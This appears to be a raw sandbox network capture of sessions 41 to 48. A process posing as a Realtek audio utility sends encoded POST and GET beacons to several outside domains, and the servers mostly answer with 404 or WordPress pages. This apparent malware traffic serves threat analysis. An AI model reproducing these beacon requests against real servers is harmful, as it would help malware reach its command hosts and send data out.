                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.rgenerousrs.store
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:58:03.907243967 CET | 1119 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:58:03 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aqgDnMzs9OnlAHmrb5WCA5mWLsp71xH3PAJfA3hPgJIWSHsd%2FVwfvpOjeXvD0SlUJ%2FT7VS%2FHi93dfWlav%2BFfjMLqM%2B9PPF5UzWrIMymJ3neMCo4p9cGS9MqnFnlvIpNEUl%2B5K6zLDsA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9001a493d9ef6176-ORD
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=118481&min_rtt=118481&rtt_var=59240&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=492&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>
Jan 11, 2025 03:58:03.907347918 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.11.20 | 49799 | 74.48.143.82 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:58:09.351660967 CET | 755 | OUT | POST /cpit/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bpgroup.site
                                                                                                                                                                              Origin: http://www.bpgroup.site
                                                                                                                                                                              Referer: http://www.bpgroup.site/cpit/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=hoDiBsmuly//kaENQjndaeUmoecBfqdtwGrtYhp5y3EZxHwdJRSb0kPawNr8eeGHgUI91JXo3kZn2H56lBiu8N2HvJdL7jxPUf154gFCW+pWC708n3qXQcaE9IIs/eKiTxPaI3/Btmv0eJO6jZ4XX43bL2lZWw9hEItACHZ7YPt6dCNLDloA6vdbFAcjAxun0A==
Jan 11, 2025 03:58:09.523541927 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 1251
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:58:09 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Jan 11, 2025 03:58:09.523552895 CET | 200 | IN |
                                                                                                                                                                              Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.11.20 | 49800 | 74.48.143.82 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:58:12.044322968 CET | 775 | OUT | POST /cpit/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bpgroup.site
                                                                                                                                                                              Origin: http://www.bpgroup.site
                                                                                                                                                                              Referer: http://www.bpgroup.site/cpit/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=hoDiBsmuly//n6UNXEzdc+Uln+cBWKdpwGntYkNTyhsZxiMdTQSb3kPa4tr9DOHFgUUP1Lzo3kNn2GJ6l2Wx8d2FxpdF1DxPUf154klkW+BWCqk8nWqIOsaFwYIs1+K+TxP0I2j/tlX0eMy6jMUWY43dFWkRehguB8lCRkhiQftEV0AReXck58BpBwlLCzv8pM/A1r3cAd9r4E4UwldfaMc=
Jan 11, 2025 03:58:12.216336012 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 1251
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:58:12 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Jan 11, 2025 03:58:12.216372967 CET  200  IN
                                                                                                                                                                              Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
43          192.168.11.20  49801        74.48.143.82    80                6612  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp  Bytes transferred  Direction  Data
Jan 11, 2025 03:58:14.746936083 CET  2578  OUT  POST /cpit/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bpgroup.site
                                                                                                                                                                              Origin: http://www.bpgroup.site
                                                                                                                                                                              Referer: http://www.bpgroup.site/cpit/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:58:14.746969938 CET  5156  OUT
Jan 11, 2025 03:58:14.747036934 CET  190  OUT
Jan 11, 2025 03:58:14.918975115 CET  1289  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 1251
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:58:15 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Jan 11, 2025 03:58:14.918992043 CET  200  IN
                                                                                                                                                                              Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
44          192.168.11.20  49802        74.48.143.82    80                6612  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp  Bytes transferred  Direction  Data
Jan 11, 2025 03:58:17.448467016 CET  487  OUT  GET /cpit/?iS=sqrCCcTnmzrg1P4sAk/QU75pr5UiXpEX3HrYYQRUrHENwAM+UA+gtHvn9s/6e57/pGZInJKN/XxZ2ntAsziA3/X4179OogJSAfxe5UAmetVNY4oSlmiuZpQ=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bpgroup.site
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:58:17.620135069 CET  1289  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 1251
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:58:17 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Jan 11, 2025 03:58:17.620177984 CET  200  IN
                                                                                                                                                                              Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
45          192.168.11.20  49803        134.0.14.158    80                6612  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp  Bytes transferred  Direction  Data
Jan 11, 2025 03:58:23.323421001 CET  758  OUT  POST /4300/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.aballanet.cat
                                                                                                                                                                              Origin: http://www.aballanet.cat
                                                                                                                                                                              Referer: http://www.aballanet.cat/4300/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:58:23.737550974 CET  1289  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:58:23 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                              Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UPC"> <meta name='robots' content='noindex,
                                                                                                                                                                              Jan 11, 2025 03:58:23.737627983 CET1289INData Raw: 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 7a 65 73 3d 22 61 75 74 6f 22 20 69 5d 2c 20 5b 73 69 7a 65 73 5e 3d 22 61 75 74 6f 2c 22 20 69 5d 29 20 7b 20 63 6f 6e 74 61 69 6e 2d 69 6e 74 72 69 6e 73 69
                                                                                                                                                                              Data Ascii: follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og
                                                                                                                                                                              Jan 11, 2025 03:58:23.737677097 CET1289INData Raw: 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 5c
                                                                                                                                                                              Data Ascii: i\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/aballanet.cat\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,times
                                                                                                                                                                              Jan 11, 2025 03:58:23.737732887 CET1289INData Raw: 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c 79
                                                                                                                                                                              Data Ascii: nCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.
                                                                                                                                                                              Jan 11, 2025 03:58:23.737782955 CET512INData Raw: 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 3d 3d 74 26 26 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79
                                                                                                                                                                              Data Ascii: thing&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMR
                                                                                                                                                                              Jan 11, 2025 03:58:23.738063097 CET1289INData Raw: 32 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67
                                                                                                                                                                              Data Ascii: 2000<style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0
                                                                                                                                                                              Jan 11, 2025 03:58:23.738136053 CET1289INData Raw: 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 64 69 73 74 2f 65 64 69 74 6f 72 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e
                                                                                                                                                                              Data Ascii: r-css' href='http://aballanet.cat/wp-includes/css/dist/editor/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='algori_pdf_viewer-cgb-style-css-css' href='http://aballanet.cat/wp-content/plugins/algori-pdf-viewer/dist/blocks.s
                                                                                                                                                                              Jan 11, 2025 03:58:23.738178968 CET1289INData Raw: 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 37 62 64 63 62 35 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 30 30 64 30 38 34 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63
                                                                                                                                                                              Data Ascii: green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to
                                                                                                                                                                              Jan 11, 2025 03:58:23.738400936 CET1289INData Raw: 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 33 2c 31 31 32 29 20 30 25 2c 72 67 62 28 31 39 39 2c 38 31 2c 31 39 32 29 20 35 30 25 2c 72 67 62 28
                                                                                                                                                                              Data Ascii: luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient
                                                                                                                                                                              Jan 11, 2025 03:58:23.738449097 CET1289INData Raw: 20 77 72 61 70 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 20 3e 20 3a 69 73 28 2a 2c 20 64 69 76 29 7b 6d 61 72 67 69 6e 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75
                                                                                                                                                                              Data Ascii: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2
                                                                                                                                                                              Jan 11, 2025 03:58:23.960829973 CET1289INData Raw: 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 29 20 21 69 6d 70
                                                                                                                                                                              Data Ascii: ortant;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.11.20 | 49804 | 134.0.14.158 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:58:26.077445984 CET | 778 | OUT | POST /4300/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.aballanet.cat
                                                                                                                                                                              Origin: http://www.aballanet.cat
                                                                                                                                                                              Referer: http://www.aballanet.cat/4300/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=Q/Q5fRI+4AZmutrLSirDAJD+tD6MmoQyqiCmAczr+k80JTeEGYKGLWCCKbyiTZwyZRCdlOHUmKD1sAMiT1Tl15lRSaxu/vvp5pZStR3t69+craTmgxPNRlY68u+ZHdZqcZxuWgjV3txZgqJE9nrsCnwG/sb4Du8gTMwPwgbPBC7zbCs9/cKW2fjSTDcwEnr7LPHzD7+AxMv5EbXbr6TGEtw=
Jan 11, 2025 03:58:26.487404108 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:58:26 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                              Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.11.20 | 49805 | 134.0.14.158 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:58:28.826461077 CET | 2578 | OUT | POST /4300/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.aballanet.cat
                                                                                                                                                                              Origin: http://www.aballanet.cat
                                                                                                                                                                              Referer: http://www.aballanet.cat/4300/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:58:29.262090921 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:58:28 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                              Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.11.20 | 49806 | 134.0.14.158 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:58:31.574815989 CET | 488 | OUT | GET /4300/?iS=d94ZcmMq/ThngNvhRkyBH4O0kUOwnOVlpzbjHd6+2TtVHAifM7eyMUHxFon7bcIQfzPiuuHPlbPirzhbYxLc+qoRY5lZ+tP99KhqilPg4uPHk5PRth/KSxs=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.aballanet.cat
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:58:31.954672098 CET | 484 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:58:31 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                              X-Redirect-By: WordPress
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Location: http://aballanet.cat/4300/?iS=d94ZcmMq/ThngNvhRkyBH4O0kUOwnOVlpzbjHd6+2TtVHAifM7eyMUHxFon7bcIQfzPiuuHPlbPirzhbYxLc+qoRY5lZ+tP99KhqilPg4uPHk5PRth/KSxs=&Bi=zJ_w6yPG
                                                                                                                                                                              Content-Length: 0
